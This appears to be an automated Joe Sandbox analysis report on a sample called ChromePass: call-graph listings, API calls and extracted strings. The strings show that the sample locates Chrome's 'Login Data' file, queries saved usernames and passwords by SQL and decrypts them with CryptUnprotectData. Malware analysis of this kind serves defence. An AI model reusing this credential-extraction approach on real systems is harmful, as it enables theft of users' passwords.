4213a0 125 API calls 21538->21541 21545 4217b6 21541->21545 21542 42180d 21543 42181b atoi 21542->21543 21542->21548 21543->21548 21544 4217c9 21547 40b168 4 API calls 21544->21547 21545->21544 21545->21548 21594 4216e7 16 API calls 21545->21594 21547->21548 21548->21498 21548->21500 21550 40b0a5 10 API calls 21549->21550 21551 40b363 21550->21551 21552 40b379 21551->21552 21553 40b36a memset 21551->21553 21552->21500 21554 411345 21552->21554 21553->21552 21597 411249 21554->21597 21558 4213c3 21557->21558 21559 4213ca 21557->21559 21558->21528 21620 40b344 RtlEnterCriticalSection GetCurrentThreadId 21559->21620 21561 421597 21563 4215b5 21561->21563 21656 4161c6 90 API calls 21561->21656 21565 4215c5 21563->21565 21566 40b168 4 API calls 21563->21566 21657 40b517 25 API calls 21565->21657 21566->21565 21568 421621 21570 42162b RtlLeaveCriticalSection 21568->21570 21570->21558 21571 4215d2 21571->21568 21571->21570 21658 42a958 26 API calls 21571->21658 21574 4215f2 strlen 21576 40b0a5 11 API calls 21574->21576 21579 421602 21576->21579 21577 40b168 4 API calls 21583 4213d5 21577->21583 21579->21570 21659 42a958 26 API calls 21579->21659 21581 421574 isspace 21581->21583 21583->21561 21583->21577 21583->21581 21621 421e76 21583->21621 21628 41637d 21583->21628 21650 40b37e 12 API calls 21583->21650 21651 4165ef 26 API calls 21583->21651 21652 4165d1 28 API calls 21583->21652 21653 416554 25 API calls 21583->21653 21654 4165ad 26 API calls 21583->21654 21655 4161c6 90 API calls 21583->21655 21585 421613 memcpy 21585->21570 21587->21524 21588->21510 21589->21516 21590->21524 21591->21524 21592->21518 21593->21548 21594->21544 21595->21548 21596->21542 21598 411263 21597->21598 21599 41127d 21597->21599 21600 411269 21598->21600 21618 413293 55 API calls 21598->21618 21599->21600 21602 4112a3 21599->21602 21611 411013 21599->21611 21600->21505 21600->21510 21601 4112dd 21604 410aea 55 API calls 21601->21604 21607 4112e1 21601->21607 21602->21600 21602->21601 21606 
40ee9a 4 API calls 21602->21606 21604->21607 21606->21601 21607->21600 21608 410b2e 24 API calls 21607->21608 21609 411308 21608->21609 21619 410f66 24 API calls 21609->21619 21612 411048 21611->21612 21616 411031 21611->21616 21612->21602 21613 410df6 56 API calls 21613->21616 21614 410f66 24 API calls 21614->21616 21615 40fae1 13 API calls 21615->21616 21616->21612 21616->21613 21616->21614 21616->21615 21617 410f91 61 API calls 21616->21617 21617->21616 21618->21599 21619->21600 21620->21583 21622 421e80 21621->21622 21623 421e84 21622->21623 21660 40b344 RtlEnterCriticalSection GetCurrentThreadId 21622->21660 21623->21583 21625 421e91 21661 421ccc memset 21625->21661 21629 416397 21628->21629 21630 41646a 21628->21630 21692 40b344 RtlEnterCriticalSection GetCurrentThreadId 21629->21692 21630->21583 21633 416473 21643 41644d 21633->21643 21709 416222 25 API calls 21633->21709 21634 421e76 125 API calls 21637 4163aa 21634->21637 21636 41645a RtlLeaveCriticalSection 21636->21630 21637->21633 21637->21634 21637->21643 21693 4162cf 21637->21693 21703 416647 6 API calls 21637->21703 21704 415875 89 API calls 21637->21704 21705 40b344 RtlEnterCriticalSection GetCurrentThreadId 21637->21705 21706 4157be 89 API calls 21637->21706 21707 414f50 14 API calls 21637->21707 21639 416499 21640 40b168 4 API calls 21639->21640 21642 4164a7 21640->21642 21642->21643 21710 40b438 13 API calls 21642->21710 21708 40b517 25 API calls 21643->21708 21649 416421 RtlLeaveCriticalSection 21649->21637 21650->21583 21651->21583 21652->21583 21653->21583 21654->21583 21655->21583 21656->21563 21657->21571 21658->21574 21659->21585 21660->21625 21662 421d02 21661->21662 21663 421d64 21661->21663 21662->21663 21665 421d0e 21662->21665 21664 42a11f 126 API calls 21663->21664 21671 421d54 21664->21671 21666 421d13 21665->21666 21667 421d2b 21665->21667 21669 40c04b 25 API calls 21666->21669 21668 40b480 12 API calls 21667->21668 21670 421d32 21668->21670 21691 421d21 RtlLeaveCriticalSection 
21669->21691 21670->21671 21673 42a11f 126 API calls 21670->21673 21672 421dad 21671->21672 21674 421bd1 63 API calls 21671->21674 21677 41c8c3 17 API calls 21672->21677 21678 421dc8 21672->21678 21675 421d4b 21673->21675 21674->21672 21676 40b168 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21675->21676 21676->21671 21677->21678 21680 40b480 12 API calls 21678->21680 21681 421e0a 21678->21681 21679 4161c6 90 API calls 21682 421e1e 21679->21682 21680->21681 21681->21679 21681->21682 21683 421e5b 21682->21683 21684 421e3e 21682->21684 21686 40c04b 25 API calls 21683->21686 21685 40c04b 25 API calls 21684->21685 21687 421e4e 21685->21687 21688 421e59 21686->21688 21689 40b168 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21687->21689 21690 40b517 25 API calls 21688->21690 21689->21688 21690->21691 21691->21623 21692->21637 21694 4162db 21693->21694 21695 4162e3 21693->21695 21694->21637 21695->21694 21696 416302 21695->21696 21697 416877 86 API calls 21695->21697 21696->21694 21702 40c04b 25 API calls 21696->21702 21698 416335 21697->21698 21699 40c04b 25 API calls 21698->21699 21700 416341 21699->21700 21701 40b517 25 API calls 21700->21701 21701->21696 21702->21694 21703->21637 21704->21637 21705->21637 21706->21637 21707->21649 21708->21636 21709->21639 21710->21643 21712 40bdcd 21711->21712 21717 40b58e 21712->21717 21720 40b5b0 __aullrem __aulldvrm 21717->21720 21724 40bc0c 21717->21724 21718 40bc0e 21734 40bc6a 16 API calls 21718->21734 21720->21718 21721 40b549 16 API calls 21720->21721 21722 40ba4e strlen 21720->21722 21723 40b168 4 API calls 21720->21723 21720->21724 21725 40b9ce memset 21720->21725 21726 40bc6a 16 API calls 21720->21726 21727 40b0a5 11 API calls 21720->21727 21721->21720 21722->21720 21723->21720 21728 40bd60 21724->21728 21725->21720 21726->21720 21727->21720 21729 40bd68 21728->21729 21732 40bda0 21728->21732 21730 40b0a5 11 API calls 21729->21730 21729->21732 21731 40bd86 21730->21731 
21731->21732 21733 40bd8e memcpy 21731->21733 21732->21451 21733->21732 21734->21724 21735->21295 21736->21299 21737->21310 21738->21314 21739->21303 21740->21313 21741->21317 21742->21319 21743->21321 21744->21323 21745->21325 21746->21327 21747->21333 21748->21336 21749->21338 21750->21346 21751->21346 21752->21342 21753->21355 21754->21355 21755->21361 21756->21361 21757->21361 21758->21361 21759->21361 21760->21361 21761->21369 21762->21369 21763->21369 21764->21333 22342 40a778 22345 40a649 22342->22345 22344 40a798 22346 40a655 22345->22346 22347 40a667 GetPrivateProfileIntW 22345->22347 22350 40a556 memset _itow WritePrivateProfileStringW 22346->22350 22347->22344 22349 40a662 22349->22344 22350->22349 22499 428d7a 19 API calls 22501 41fb78 19 API calls 22502 406d79 SendMessageW SendMessageW SendMessageW 22505 40157e ??2@YAPAXI memset memcpy ??3@YAXPAX 22506 41ef7e 19 API calls 22507 41bb01 20 API calls 22508 40cf01 SetFilePointer GetLastError WriteFile 22509 408502 8 API calls 22510 428d00 21 API calls 22511 40d702 8 API calls 22516 405d0a GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 22517 41f70b 29 API calls 22520 41fd0f 20 API calls 22521 40d511 38 API calls 22523 401f16 24 API calls 22524 428f18 16 API calls 20790 429b23 127 API calls 20843 418929 20844 419117 20843->20844 20845 418939 20843->20845 20846 418970 20845->20846 20847 418969 20845->20847 20854 4168c7 20845->20854 20873 411e1f 74 API calls 20846->20873 20857 411d44 20847->20857 20853 416fe7 20855 416b5c 20854->20855 20856 416998 20854->20856 20870 414172 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20854->20870 20872 415583 86 API calls 20855->20872 20871 40b4a0 16 API calls 20856->20871 20858 411d54 20857->20858 20860 411d5a 20857->20860 20887 410323 74 API calls 20858->20887 20861 411da5 20860->20861 20862 411d6b 20860->20862 20863 411dc7 20860->20863 20874 411808 20861->20874 20862->20854 20863->20862 20868 411de1 20863->20868 20883 411880 
20863->20883 20868->20862 20869 411d44 74 API calls 20868->20869 20869->20862 20870->20854 20871->20855 20872->20853 20873->20854 20888 410aea 20874->20888 20878 41183a 20878->20862 20879 411963 20878->20879 20881 411968 20879->20881 20880 411998 20880->20862 20881->20880 20882 411808 55 API calls 20881->20882 20882->20881 20884 411895 20883->20884 20885 410b2e 24 API calls 20884->20885 20886 41189c 20885->20886 20886->20863 20887->20860 20889 410af7 20888->20889 20893 410af2 20888->20893 20898 410a9b 20889->20898 20891 410b01 20892 410b2e 24 API calls 20891->20892 20891->20893 20892->20893 20893->20878 20894 410b2e 20893->20894 20895 410b33 20894->20895 20896 410b3b 20894->20896 21042 40f96d 24 API calls 20895->21042 20896->20878 20901 40f7de 20898->20901 20900 410aaf 20900->20891 20902 40f7f9 20901->20902 20919 40f8a7 20901->20919 20902->20919 20921 40f4c6 20902->20921 20904 40f821 20905 40f840 20904->20905 20906 40f93b 20904->20906 20904->20919 20951 40f6e0 20 API calls 20905->20951 20906->20919 20958 40f7bf SetFilePointer GetLastError ReadFile memset memcpy 20906->20958 20909 40f84c 20910 40f892 20909->20910 20911 40f884 memset 20909->20911 20909->20919 20952 40ee9a 20910->20952 20911->20910 20913 40f8e1 20914 40f8eb memset 20913->20914 20920 40f89e 20913->20920 20914->20919 20916 40f897 20916->20913 20917 40f8bf 20916->20917 20916->20920 20957 40f460 SetFilePointer GetLastError ReadFile memset memcpy 20917->20957 20919->20900 20920->20919 20956 40f96d 24 API calls 20920->20956 20922 40f4de 20921->20922 20925 40f4fe 20921->20925 20922->20925 21004 40e0de free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20922->21004 20923 40f538 20923->20904 20924 40f53d 20959 40f37f 20924->20959 20925->20923 20925->20924 20928 40f52f 20925->20928 21005 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20928->21005 20931 40f65b 20934 40f54b 20931->20934 20935 40ee9a 4 API calls 20931->20935 20933 40f5c7 20933->20934 20984 
40e72b 20933->20984 20934->20923 21008 40e144 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20934->21008 20938 40f668 20935->20938 20936 40f57f 21006 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20936->21006 20938->20934 20941 40f696 memset 20938->20941 20942 40f678 20938->20942 20939 40f64b 20939->20931 20939->20936 20944 40f6a5 memcmp 20941->20944 20998 40ce7a SetFilePointer 20942->20998 20944->20934 20946 40f6be 20944->20946 21007 40e0de free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20946->21007 20951->20909 20953 40eeb6 20952->20953 20954 40eeae __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20952->20954 20953->20954 21041 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 20953->21041 20954->20916 20956->20919 20957->20920 20958->20919 20960 40f390 20959->20960 20963 40f38c 20959->20963 20960->20963 20964 40d4ac 14 API calls 20960->20964 20961 40f3a2 20962 40ee9a 4 API calls 20961->20962 20961->20963 20962->20963 20963->20931 20963->20933 20963->20934 20963->20936 20965 40d4ac 20963->20965 20964->20961 20966 40d2cb 11 API calls 20965->20966 20967 40d4b9 20966->20967 20968 40d4c0 20967->20968 20969 40cc6d GetVersionExW 20967->20969 20968->20933 20974 40d302 20968->20974 20970 40d4cb 20969->20970 20971 40d4d0 GetFileAttributesW 20970->20971 20972 40d4d8 GetFileAttributesA 20970->20972 20973 40d4de free 20971->20973 20972->20973 20973->20968 20977 40d310 20974->20977 20975 40d2cb 11 API calls 20975->20977 20976 40cc6d GetVersionExW 20976->20977 20977->20975 20977->20976 20978 40d381 CreateFileA 20977->20978 20979 40d379 CreateFileW 20977->20979 20980 40d3c6 memset free 20977->20980 20981 40d38e free 20977->20981 20982 40d3bd 20977->20982 20978->20977 20979->20977 20980->20982 20981->20977 20981->20982 20982->20933 20985 40e74d 20984->20985 20986 40e7a5 20985->20986 20987 40e8da 20985->20987 20988 40db3e 5 API calls 20985->20988 20986->20939 20987->20986 
21009 40db3e 20987->21009 20995 40e77d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20988->20995 20995->20986 20995->20987 21029 40e676 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId memset 20995->21029 21030 40e338 6 API calls 20995->21030 21031 40de19 18 API calls 20995->21031 20999 40ceb8 ReadFile 20998->20999 21000 40cea9 GetLastError 20998->21000 21001 40ceb3 20999->21001 21002 40cedc 20999->21002 21000->20999 21000->21001 21001->20934 21001->20944 21002->21001 21003 40cee7 memset 21002->21003 21003->21001 21004->20925 21005->20923 21006->20934 21007->20934 21008->20923 21010 40db52 21009->21010 21013 40db9a 21010->21013 21033 40dab7 SetFilePointer GetLastError ReadFile memset 21010->21033 21012 40db87 21012->21013 21034 40dab7 SetFilePointer GetLastError ReadFile memset 21012->21034 21013->20986 21021 40e1fb 21013->21021 21015 40dbb9 21015->21013 21035 40aef9 21015->21035 21018 40dbe9 memcmp 21018->21013 21019 40dc00 21018->21019 21020 40aef9 4 API calls 21019->21020 21020->21013 21022 40e218 21021->21022 21026 40e211 21021->21026 21038 41023f free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21022->21038 21024 40e248 21040 40d9c2 free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21024->21040 21025 40e21f 21025->21024 21025->21026 21039 40db0d free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21025->21039 21026->20986 21032 40e4c8 20 API calls 21026->21032 21029->20995 21030->20995 21031->20995 21032->20986 21033->21012 21034->21015 21037 40ce7a 4 API calls 21035->21037 21036 40af0f 21036->21013 21036->21018 21037->21036 21038->21025 21039->21024 21040->21026 21041->20954 21042->20896 22531 428920 26 API calls 22535 4168c7 94 API calls 22536 41eb36 20 API calls 22538 401338 11 API calls 22540 410b3d 24 API calls 22542 40413f 6 API calls 22543 40233f 55 API calls 22544 41fd3e 26 API calls 22547 4168c7 86 API calls 22550 40a7c7 WritePrivateProfileStringW 
GetPrivateProfileStringW 21043 40b3c8 21044 40b3d8 21043->21044 21045 40b3cf 21043->21045 21047 40b1ac 21045->21047 21048 40b1c6 21047->21048 21049 40b1ba 21047->21049 21051 40b1d8 21048->21051 21052 40b1ca 21048->21052 21065 40b0a5 21049->21065 21083 40b344 RtlEnterCriticalSection GetCurrentThreadId 21051->21083 21078 40b168 21052->21078 21053 40b1c0 21053->21044 21056 40b1eb 21057 40b22b realloc 21056->21057 21084 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21056->21084 21058 40b23d 21057->21058 21064 40b256 21057->21064 21085 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21058->21085 21061 40b2a1 RtlLeaveCriticalSection 21061->21053 21062 40b22a 21062->21057 21063 40b243 realloc 21063->21061 21063->21064 21064->21061 21066 40b161 21065->21066 21067 40b0b7 21065->21067 21066->21053 21086 40b019 21067->21086 21069 40b0ec malloc 21070 40b110 21069->21070 21071 40b0fc 21069->21071 21073 40b152 RtlLeaveCriticalSection 21070->21073 21094 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21071->21094 21073->21066 21075 40b102 malloc 21075->21070 21075->21073 21077 40b0eb 21077->21069 21079 40b170 21078->21079 21080 40b1ab 21078->21080 21097 40b344 RtlEnterCriticalSection GetCurrentThreadId 21079->21097 21080->21053 21082 40b183 free RtlLeaveCriticalSection 21082->21080 21083->21056 21084->21062 21085->21063 21087 40b034 21086->21087 21088 40b024 21086->21088 21095 40b344 RtlEnterCriticalSection GetCurrentThreadId 21087->21095 21096 40b2b6 11 API calls 21088->21096 21091 40b02b 21091->21087 21092 40b039 21092->21069 21093 40b03b RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 21092->21093 21093->21077 21094->21075 21095->21092 21096->21091 21097->21082 22551 41e9c8 27 API calls 22553 41ebcf 28 API calls 22554 40d1d3 LockFile UnlockFile 22555 4139d2 74 API calls 22556 4168c7 89 API calls 22557 40d7d3 GetSystemTimeAsFileTime 22558 428bd6 22 API calls 22559 41fbd7 18 API 
calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22560 41fdd7 20 API calls 22561 40cfd6 GetFileSize 22563 4111db free RtlLeaveCriticalSection RtlEnterCriticalSection GetCurrentThreadId 22564 428fdc 23 API calls 22565 4293e2 23 API calls 22568 4168c7 87 API calls 22569 41efe9 23 API calls 22572 4289cc 25 API calls 22574 4168c7 88 API calls 22575 428fed 27 API calls 22576 4081f1 11 API calls 22579 4168c7 101 API calls 22583 418f82 128 API calls 22585 41f384 26 API calls 22586 41ed84 25 API calls 22588 40cf86 SetFilePointer SetEndOfFile 22589 40418f SendDlgItemMessageW SetDlgItemTextW GetDlgItemTextW SendDlgItemMessageW SendDlgItemMessageW 22590 4168c7 88 API calls 22592 42ad93 _onexit 22593 402797 modf 22595 42979a 48 API calls 22597 428999 25 API calls 22599 40279c 16 API calls 22601 4013a1 memcpy memcpy GetModuleHandleW DialogBoxParamW 20826 40a7a2 20829 40a5a3 20826->20829 20830 40a5b0 20829->20830 20831 40a602 memset GetPrivateProfileStringW 20830->20831 20832 40a5cf memset 20830->20832 20837 4052e7 wcslen 20831->20837 20842 40525e _snwprintf memcpy 20832->20842 20835 40a641 20836 40a5e5 WritePrivateProfileStringW 20836->20835 20838 4052fb 20837->20838 20839 4052fd 20837->20839 20838->20835 20840 405333 wcstoul 20839->20840 20841 405351 20839->20841 20840->20839 20841->20835 20842->20836 22603 42ada1 __dllonexit 22605 4289cc 27 API calls 22606 4289ab 26 API calls 22607 4099ad 67 API calls 22608 40d7ae Sleep 22609 40a9b0 memset SHGetPathFromIDListW SendMessageW 22610 4013b1 ExitProcess 22611 41efb0 16 API calls 22615 4168c7 97 API calls 22616 405dbe 8 API calls 22617 40cfbe FlushFileBuffers

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004033D0: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004033EF
                                          • Part of subcall function 004033D0: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403401
                                          • Part of subcall function 004033D0: FreeLibrary.KERNEL32(00000000), ref: 00403415
                                          • Part of subcall function 004033D0: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403440
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00409748
                                        • GetModuleHandleW.KERNEL32(00000000,0040A8CF,00000000), ref: 00409761
                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 00409768
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 004097FE
                                        • DeleteObject.GDI32(?), ref: 00409818
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 3591293073-28296030
                                        • Opcode ID: 35b8df080bc2080e27bc36b60c2643d49e0eaed20a2b05d61420e0365af72530
                                        • Instruction ID: ed94949e07262d2860e77650e53181bcd1e3b97a6f049840a4915c6ce7c1fc3d
                                        • Opcode Fuzzy Hash: 35b8df080bc2080e27bc36b60c2643d49e0eaed20a2b05d61420e0365af72530
                                        • Instruction Fuzzy Hash: 526190B1508342DBC720AFA2DC49A5FBBE9FF84304F40493EF585A2262DB758915CF5A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00401948
                                        • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040195F
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00401982
                                          • Part of subcall function 00405422: MultiByteToWideChar.KERNEL32(00000000,00000000,00401AC1,000000FF,?,?,00401AC1,?,?,000003FF), ref: 00405434
                                          • Part of subcall function 004165AD: RtlLeaveCriticalSection.NTDLL(?), ref: 004165C9
                                        • CloseHandle.KERNELBASE(00000000), ref: 0040198B
                                        • memset.MSVCRT ref: 004019BB
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 004019D2
                                        • memset.MSVCRT ref: 00401A3E
                                          • Part of subcall function 00404B38: GetTempPathW.KERNEL32(00000104,?), ref: 00404B4F
                                          • Part of subcall function 00404B38: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00404B61
                                          • Part of subcall function 00404B38: GetTempFileNameW.KERNEL32(?,0040197A,00000000,?), ref: 00404B78
                                        • LoadLibraryW.KERNEL32(crypt32.dll), ref: 00401B85
                                        • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00401B9A
                                        • FreeLibrary.KERNEL32(00000000), ref: 00401BCD
                                        • memset.MSVCRT ref: 00401C19
                                        • memcpy.MSVCRT(?,00000000,00000000,000000FF,00000414,00000000), ref: 00401C2C
                                        • MultiByteToWideChar.KERNEL32 ref: 00401C51
                                        • LocalFree.KERNEL32(00000000), ref: 00401C5A
                                        • DeleteFileW.KERNEL32(?), ref: 00401CA1
                                          • Part of subcall function 0040315B: memcmp.MSVCRT(?,00000414,00000005,00000000,00000000,000000FF), ref: 00403198
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 004031B9
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 004031D5
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 0040320E
                                          • Part of subcall function 0040315B: memset.MSVCRT ref: 0040322A
                                        Strings
                                        • crypt32.dll, xrefs: 00401B80
                                        • chp, xrefs: 0040196A
                                        • SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00401A02
                                        • CryptUnprotectData, xrefs: 00401B94
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$File$ByteCharMultiWide$FreeLibraryTemp$AddressCloseCopyCreateCriticalDeleteDirectoryHandleLeaveLoadLocalNamePathProcSectionWindowsmemcmpmemcpy
                                        • String ID: CryptUnprotectData$SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp$crypt32.dll
                                        • API String ID: 3739329394-3935444698
                                        • Opcode ID: 492ea2985a48da43712046777eb980aa399b26ce661c150a15ad42de6d304c3c
                                        • Instruction ID: 37b8e6ad1c2f444f68e26bcb06950449ee6f7690af2a1aeb5c6f76d6147c7710
                                        • Opcode Fuzzy Hash: 492ea2985a48da43712046777eb980aa399b26ce661c150a15ad42de6d304c3c
                                        • Instruction Fuzzy Hash: 52A1A272900218AFDB10ABA4DC85FEE7779EF04318F50457AF914F7291EB389E848B59

                                        Control-flow Graph

                                        control_flow_graph 139 42ae90-42aeaa call 42b0a0 GetModuleHandleA 142 42aecb-42aece 139->142 143 42aeac-42aeb7 139->143 145 42aef7-42af46 __set_app_type __p__fmode __p__commode call 40705c 142->145 143->142 144 42aeb9-42aec2 143->144 146 42aee3-42aee7 144->146 147 42aec4-42aec9 144->147 154 42af54-42afaa call 42b08c _initterm __wgetmainargs _initterm 145->154 155 42af48-42af53 __setusermatherr 145->155 146->142 150 42aee9-42aeeb 146->150 147->142 149 42aed0-42aed7 147->149 149->142 152 42aed9-42aee1 149->152 153 42aef1-42aef4 150->153 152->153 153->145 158 42afba-42afc1 154->158 159 42afac-42afb5 154->159 155->154 161 42afc3-42afce 158->161 162 42b008-42b00c 158->162 160 42b074-42b079 call 42b0d9 159->160 164 42afd0-42afd4 161->164 165 42afd6-42afda 161->165 166 42afe1-42afe7 162->166 167 42b00e-42b013 162->167 164->161 164->165 165->166 169 42afdc-42afde 165->169 170 42afe9-42afed 166->170 171 42afef-42b000 GetStartupInfoW 166->171 167->162 169->166 170->169 170->171 172 42b002-42b006 171->172 173 42b015-42b017 171->173 174 42b018-42b030 GetModuleHandleA call 409720 172->174 173->174 177 42b032-42b033 exit 174->177 178 42b039-42b072 _cexit 174->178 177->178 178->160
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                        • String ID:
                                        • API String ID: 2827331108-0
                                        • Opcode ID: e0751aec1486ceef8b5882055fc93caa6edd968f6601c79cd871996c5dd874b0
                                        • Instruction ID: 601f2f4c144d1a6f5b028c6b48ba5c4040d8dd7e292e416d485a145d7e2d090f
                                        • Opcode Fuzzy Hash: e0751aec1486ceef8b5882055fc93caa6edd968f6601c79cd871996c5dd874b0
                                        • Instruction Fuzzy Hash: 4B519071E40225DBCB35EFA4E9849AE77B0FB44310FA1452BE86197291D73C4983CB9E

                                        Control-flow Graph

                                        control_flow_graph 180 40212b-4021ac memset _snwprintf memset wcslen * 2 181 4021c6 180->181 182 4021ae-4021c4 call 404d63 180->182 184 4021cb-4021d8 call 404b83 181->184 182->184 188 4021da-4021e8 call 401922 184->188 189 4021ed-402224 _snwprintf wcslen * 2 184->189 188->189 191 402226-40223c call 404d63 189->191 192 40223e 189->192 194 402243-402250 call 404b83 191->194 192->194 198 402252-402260 call 401922 194->198 199 402265-40226b 194->199 198->199
                                        APIs
                                        Strings
                                        • %s\User Data\Default\Web Data, xrefs: 00402163
                                        • %s\User Data\Default\Login Data, xrefs: 004021F7
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcslen$_snwprintfmemset$wcscatwcscpy
                                        • String ID: %s\User Data\Default\Login Data$%s\User Data\Default\Web Data
                                        • API String ID: 798694999-429399637
                                        • Opcode ID: 45261314242161afbbebf0664bc0bb71ab186811fdfce6921e4fb762442c369c
                                        • Instruction ID: 2ae69603a04c5ddda3a347a726102e89345d5e74ea1ed18f83a6d4f8f798cee6
                                        • Opcode Fuzzy Hash: 45261314242161afbbebf0664bc0bb71ab186811fdfce6921e4fb762442c369c
                                        • Instruction Fuzzy Hash: B331A0725182096BC720EFA5EC89D9B73EDEF84318F54093FF914D2091EB38D618875A

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
